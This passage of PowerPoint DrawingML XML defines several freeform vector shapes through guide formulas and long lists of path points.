                      <a:pt x="305" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="367"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="231" y="136"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="231" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="136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2" name="Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7121525" y="5149850"/>
                <a:ext cx="206375" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 574"/>
                  <a:gd name="T1" fmla="*/ 142 h 531"/>
                  <a:gd name="T2" fmla="*/ 189 w 574"/>
                  <a:gd name="T3" fmla="*/ 131 h 531"/>
                  <a:gd name="T4" fmla="*/ 158 w 574"/>
                  <a:gd name="T5" fmla="*/ 131 h 531"/>
                  <a:gd name="T6" fmla="*/ 147 w 574"/>
                  <a:gd name="T7" fmla="*/ 136 h 531"/>
                  <a:gd name="T8" fmla="*/ 132 w 574"/>
                  <a:gd name="T9" fmla="*/ 152 h 531"/>
                  <a:gd name="T10" fmla="*/ 121 w 574"/>
                  <a:gd name="T11" fmla="*/ 194 h 531"/>
                  <a:gd name="T12" fmla="*/ 121 w 574"/>
                  <a:gd name="T13" fmla="*/ 215 h 531"/>
                  <a:gd name="T14" fmla="*/ 132 w 574"/>
                  <a:gd name="T15" fmla="*/ 236 h 531"/>
                  <a:gd name="T16" fmla="*/ 179 w 574"/>
                  <a:gd name="T17" fmla="*/ 278 h 531"/>
                  <a:gd name="T18" fmla="*/ 247 w 574"/>
                  <a:gd name="T19" fmla="*/ 325 h 531"/>
                  <a:gd name="T20" fmla="*/ 320 w 574"/>
                  <a:gd name="T21" fmla="*/ 373 h 531"/>
                  <a:gd name="T22" fmla="*/ 352 w 574"/>
                  <a:gd name="T23" fmla="*/ 388 h 531"/>
                  <a:gd name="T24" fmla="*/ 378 w 574"/>
                  <a:gd name="T25" fmla="*/ 399 h 531"/>
                  <a:gd name="T26" fmla="*/ 420 w 574"/>
                  <a:gd name="T27" fmla="*/ 399 h 531"/>
                  <a:gd name="T28" fmla="*/ 436 w 574"/>
                  <a:gd name="T29" fmla="*/ 388 h 531"/>
                  <a:gd name="T30" fmla="*/ 452 w 574"/>
                  <a:gd name="T31" fmla="*/ 373 h 531"/>
                  <a:gd name="T32" fmla="*/ 463 w 574"/>
                  <a:gd name="T33" fmla="*/ 341 h 531"/>
                  <a:gd name="T34" fmla="*/ 452 w 574"/>
                  <a:gd name="T35" fmla="*/ 315 h 531"/>
                  <a:gd name="T36" fmla="*/ 441 w 574"/>
                  <a:gd name="T37" fmla="*/ 294 h 531"/>
                  <a:gd name="T38" fmla="*/ 378 w 574"/>
                  <a:gd name="T39" fmla="*/ 241 h 531"/>
                  <a:gd name="T40" fmla="*/ 457 w 574"/>
                  <a:gd name="T41" fmla="*/ 131 h 531"/>
                  <a:gd name="T42" fmla="*/ 530 w 574"/>
                  <a:gd name="T43" fmla="*/ 194 h 531"/>
                  <a:gd name="T44" fmla="*/ 567 w 574"/>
                  <a:gd name="T45" fmla="*/ 262 h 531"/>
                  <a:gd name="T46" fmla="*/ 573 w 574"/>
                  <a:gd name="T47" fmla="*/ 304 h 531"/>
                  <a:gd name="T48" fmla="*/ 552 w 574"/>
                  <a:gd name="T49" fmla="*/ 388 h 531"/>
                  <a:gd name="T50" fmla="*/ 525 w 574"/>
                  <a:gd name="T51" fmla="*/ 430 h 531"/>
                  <a:gd name="T52" fmla="*/ 463 w 574"/>
                  <a:gd name="T53" fmla="*/ 504 h 531"/>
                  <a:gd name="T54" fmla="*/ 426 w 574"/>
                  <a:gd name="T55" fmla="*/ 525 h 531"/>
                  <a:gd name="T56" fmla="*/ 383 w 574"/>
                  <a:gd name="T57" fmla="*/ 530 h 531"/>
                  <a:gd name="T58" fmla="*/ 289 w 574"/>
                  <a:gd name="T59" fmla="*/ 514 h 531"/>
                  <a:gd name="T60" fmla="*/ 231 w 574"/>
                  <a:gd name="T61" fmla="*/ 488 h 531"/>
                  <a:gd name="T62" fmla="*/ 163 w 574"/>
                  <a:gd name="T63" fmla="*/ 446 h 531"/>
                  <a:gd name="T64" fmla="*/ 52 w 574"/>
                  <a:gd name="T65" fmla="*/ 351 h 531"/>
                  <a:gd name="T66" fmla="*/ 22 w 574"/>
                  <a:gd name="T67" fmla="*/ 304 h 531"/>
                  <a:gd name="T68" fmla="*/ 5 w 574"/>
                  <a:gd name="T69" fmla="*/ 262 h 531"/>
                  <a:gd name="T70" fmla="*/ 5 w 574"/>
                  <a:gd name="T71" fmla="*/ 178 h 531"/>
                  <a:gd name="T72" fmla="*/ 22 w 574"/>
                  <a:gd name="T73" fmla="*/ 136 h 531"/>
                  <a:gd name="T74" fmla="*/ 48 w 574"/>
                  <a:gd name="T75" fmla="*/ 94 h 531"/>
                  <a:gd name="T76" fmla="*/ 111 w 574"/>
                  <a:gd name="T77" fmla="*/ 31 h 531"/>
                  <a:gd name="T78" fmla="*/ 179 w 574"/>
                  <a:gd name="T79" fmla="*/ 0 h 531"/>
                  <a:gd name="T80" fmla="*/ 216 w 574"/>
                  <a:gd name="T81" fmla="*/ 0 h 531"/>
                  <a:gd name="T82" fmla="*/ 299 w 574"/>
                  <a:gd name="T83" fmla="*/ 26 h 531"/>
                  <a:gd name="T84" fmla="*/ 263 w 574"/>
                  <a:gd name="T85" fmla="*/ 163 h 531"/>
                  <a:gd name="T86" fmla="*/ 226 w 574"/>
                  <a:gd name="T87" fmla="*/ 142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574" h="531">
                    <a:moveTo>
                      <a:pt x="226" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="142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3" name="Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="4975225"/>
                <a:ext cx="249237" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 694"/>
                  <a:gd name="T1" fmla="*/ 367 h 604"/>
                  <a:gd name="T2" fmla="*/ 567 w 694"/>
                  <a:gd name="T3" fmla="*/ 367 h 604"/>
                  <a:gd name="T4" fmla="*/ 588 w 694"/>
                  <a:gd name="T5" fmla="*/ 409 h 604"/>
                  <a:gd name="T6" fmla="*/ 588 w 694"/>
                  <a:gd name="T7" fmla="*/ 424 h 604"/>
                  <a:gd name="T8" fmla="*/ 588 w 694"/>
                  <a:gd name="T9" fmla="*/ 446 h 604"/>
                  <a:gd name="T10" fmla="*/ 588 w 694"/>
                  <a:gd name="T11" fmla="*/ 446 h 604"/>
                  <a:gd name="T12" fmla="*/ 583 w 694"/>
                  <a:gd name="T13" fmla="*/ 488 h 604"/>
                  <a:gd name="T14" fmla="*/ 562 w 694"/>
                  <a:gd name="T15" fmla="*/ 530 h 604"/>
                  <a:gd name="T16" fmla="*/ 562 w 694"/>
                  <a:gd name="T17" fmla="*/ 530 h 604"/>
                  <a:gd name="T18" fmla="*/ 547 w 694"/>
                  <a:gd name="T19" fmla="*/ 556 h 604"/>
                  <a:gd name="T20" fmla="*/ 525 w 694"/>
                  <a:gd name="T21" fmla="*/ 577 h 604"/>
                  <a:gd name="T22" fmla="*/ 504 w 694"/>
                  <a:gd name="T23" fmla="*/ 593 h 604"/>
                  <a:gd name="T24" fmla="*/ 478 w 694"/>
                  <a:gd name="T25" fmla="*/ 603 h 604"/>
                  <a:gd name="T26" fmla="*/ 478 w 694"/>
                  <a:gd name="T27" fmla="*/ 603 h 604"/>
                  <a:gd name="T28" fmla="*/ 452 w 694"/>
                  <a:gd name="T29" fmla="*/ 603 h 604"/>
                  <a:gd name="T30" fmla="*/ 426 w 694"/>
                  <a:gd name="T31" fmla="*/ 603 h 604"/>
                  <a:gd name="T32" fmla="*/ 394 w 694"/>
                  <a:gd name="T33" fmla="*/ 593 h 604"/>
                  <a:gd name="T34" fmla="*/ 357 w 694"/>
                  <a:gd name="T35" fmla="*/ 571 h 604"/>
                  <a:gd name="T36" fmla="*/ 0 w 694"/>
                  <a:gd name="T37" fmla="*/ 367 h 604"/>
                  <a:gd name="T38" fmla="*/ 69 w 694"/>
                  <a:gd name="T39" fmla="*/ 241 h 604"/>
                  <a:gd name="T40" fmla="*/ 404 w 694"/>
                  <a:gd name="T41" fmla="*/ 435 h 604"/>
                  <a:gd name="T42" fmla="*/ 404 w 694"/>
                  <a:gd name="T43" fmla="*/ 435 h 604"/>
                  <a:gd name="T44" fmla="*/ 436 w 694"/>
                  <a:gd name="T45" fmla="*/ 451 h 604"/>
                  <a:gd name="T46" fmla="*/ 462 w 694"/>
                  <a:gd name="T47" fmla="*/ 451 h 604"/>
                  <a:gd name="T48" fmla="*/ 462 w 694"/>
                  <a:gd name="T49" fmla="*/ 451 h 604"/>
                  <a:gd name="T50" fmla="*/ 483 w 694"/>
                  <a:gd name="T51" fmla="*/ 441 h 604"/>
                  <a:gd name="T52" fmla="*/ 504 w 694"/>
                  <a:gd name="T53" fmla="*/ 420 h 604"/>
                  <a:gd name="T54" fmla="*/ 504 w 694"/>
                  <a:gd name="T55" fmla="*/ 420 h 604"/>
                  <a:gd name="T56" fmla="*/ 510 w 694"/>
                  <a:gd name="T57" fmla="*/ 404 h 604"/>
                  <a:gd name="T58" fmla="*/ 515 w 694"/>
                  <a:gd name="T59" fmla="*/ 388 h 604"/>
                  <a:gd name="T60" fmla="*/ 515 w 694"/>
                  <a:gd name="T61" fmla="*/ 372 h 604"/>
                  <a:gd name="T62" fmla="*/ 510 w 694"/>
                  <a:gd name="T63" fmla="*/ 362 h 604"/>
                  <a:gd name="T64" fmla="*/ 504 w 694"/>
                  <a:gd name="T65" fmla="*/ 346 h 604"/>
                  <a:gd name="T66" fmla="*/ 494 w 694"/>
                  <a:gd name="T67" fmla="*/ 330 h 604"/>
                  <a:gd name="T68" fmla="*/ 462 w 694"/>
                  <a:gd name="T69" fmla="*/ 309 h 604"/>
                  <a:gd name="T70" fmla="*/ 136 w 694"/>
                  <a:gd name="T71" fmla="*/ 120 h 604"/>
                  <a:gd name="T72" fmla="*/ 210 w 694"/>
                  <a:gd name="T73" fmla="*/ 0 h 604"/>
                  <a:gd name="T74" fmla="*/ 693 w 694"/>
                  <a:gd name="T75" fmla="*/ 277 h 604"/>
                  <a:gd name="T76" fmla="*/ 625 w 694"/>
                  <a:gd name="T77" fmla="*/ 398 h 604"/>
                  <a:gd name="T78" fmla="*/ 567 w 694"/>
                  <a:gd name="T79" fmla="*/ 362 h 604"/>
                  <a:gd name="T80" fmla="*/ 567 w 694"/>
                  <a:gd name="T81" fmla="*/ 367 h 6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94" h="604">
                    <a:moveTo>
                      <a:pt x="567" y="367"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="567" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="367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4" name="Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7288213" y="4848225"/>
                <a:ext cx="204787" cy="185738"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 567"/>
                  <a:gd name="T1" fmla="*/ 141 h 515"/>
                  <a:gd name="T2" fmla="*/ 130 w 567"/>
                  <a:gd name="T3" fmla="*/ 178 h 515"/>
                  <a:gd name="T4" fmla="*/ 130 w 567"/>
                  <a:gd name="T5" fmla="*/ 173 h 515"/>
                  <a:gd name="T6" fmla="*/ 130 w 567"/>
                  <a:gd name="T7" fmla="*/ 173 h 515"/>
                  <a:gd name="T8" fmla="*/ 110 w 567"/>
                  <a:gd name="T9" fmla="*/ 136 h 515"/>
                  <a:gd name="T10" fmla="*/ 94 w 567"/>
                  <a:gd name="T11" fmla="*/ 99 h 515"/>
                  <a:gd name="T12" fmla="*/ 94 w 567"/>
                  <a:gd name="T13" fmla="*/ 99 h 515"/>
                  <a:gd name="T14" fmla="*/ 94 w 567"/>
                  <a:gd name="T15" fmla="*/ 78 h 515"/>
                  <a:gd name="T16" fmla="*/ 94 w 567"/>
                  <a:gd name="T17" fmla="*/ 58 h 515"/>
                  <a:gd name="T18" fmla="*/ 99 w 567"/>
                  <a:gd name="T19" fmla="*/ 41 h 515"/>
                  <a:gd name="T20" fmla="*/ 104 w 567"/>
                  <a:gd name="T21" fmla="*/ 21 h 515"/>
                  <a:gd name="T22" fmla="*/ 104 w 567"/>
                  <a:gd name="T23" fmla="*/ 21 h 515"/>
                  <a:gd name="T24" fmla="*/ 115 w 567"/>
                  <a:gd name="T25" fmla="*/ 11 h 515"/>
                  <a:gd name="T26" fmla="*/ 115 w 567"/>
                  <a:gd name="T27" fmla="*/ 11 h 515"/>
                  <a:gd name="T28" fmla="*/ 120 w 567"/>
                  <a:gd name="T29" fmla="*/ 0 h 515"/>
                  <a:gd name="T30" fmla="*/ 241 w 567"/>
                  <a:gd name="T31" fmla="*/ 58 h 515"/>
                  <a:gd name="T32" fmla="*/ 241 w 567"/>
                  <a:gd name="T33" fmla="*/ 58 h 515"/>
                  <a:gd name="T34" fmla="*/ 230 w 567"/>
                  <a:gd name="T35" fmla="*/ 78 h 515"/>
                  <a:gd name="T36" fmla="*/ 230 w 567"/>
                  <a:gd name="T37" fmla="*/ 78 h 515"/>
                  <a:gd name="T38" fmla="*/ 220 w 567"/>
                  <a:gd name="T39" fmla="*/ 99 h 515"/>
                  <a:gd name="T40" fmla="*/ 220 w 567"/>
                  <a:gd name="T41" fmla="*/ 99 h 515"/>
                  <a:gd name="T42" fmla="*/ 209 w 567"/>
                  <a:gd name="T43" fmla="*/ 131 h 515"/>
                  <a:gd name="T44" fmla="*/ 209 w 567"/>
                  <a:gd name="T45" fmla="*/ 131 h 515"/>
                  <a:gd name="T46" fmla="*/ 209 w 567"/>
                  <a:gd name="T47" fmla="*/ 152 h 515"/>
                  <a:gd name="T48" fmla="*/ 209 w 567"/>
                  <a:gd name="T49" fmla="*/ 173 h 515"/>
                  <a:gd name="T50" fmla="*/ 209 w 567"/>
                  <a:gd name="T51" fmla="*/ 173 h 515"/>
                  <a:gd name="T52" fmla="*/ 214 w 567"/>
                  <a:gd name="T53" fmla="*/ 188 h 515"/>
                  <a:gd name="T54" fmla="*/ 225 w 567"/>
                  <a:gd name="T55" fmla="*/ 210 h 515"/>
                  <a:gd name="T56" fmla="*/ 225 w 567"/>
                  <a:gd name="T57" fmla="*/ 210 h 515"/>
                  <a:gd name="T58" fmla="*/ 241 w 567"/>
                  <a:gd name="T59" fmla="*/ 225 h 515"/>
                  <a:gd name="T60" fmla="*/ 262 w 567"/>
                  <a:gd name="T61" fmla="*/ 236 h 515"/>
                  <a:gd name="T62" fmla="*/ 566 w 567"/>
                  <a:gd name="T63" fmla="*/ 388 h 515"/>
                  <a:gd name="T64" fmla="*/ 498 w 567"/>
                  <a:gd name="T65" fmla="*/ 514 h 515"/>
                  <a:gd name="T66" fmla="*/ 0 w 567"/>
                  <a:gd name="T67" fmla="*/ 268 h 515"/>
                  <a:gd name="T68" fmla="*/ 62 w 567"/>
                  <a:gd name="T69" fmla="*/ 141 h 5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67" h="515">
                    <a:moveTo>
                      <a:pt x="62" y="141"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
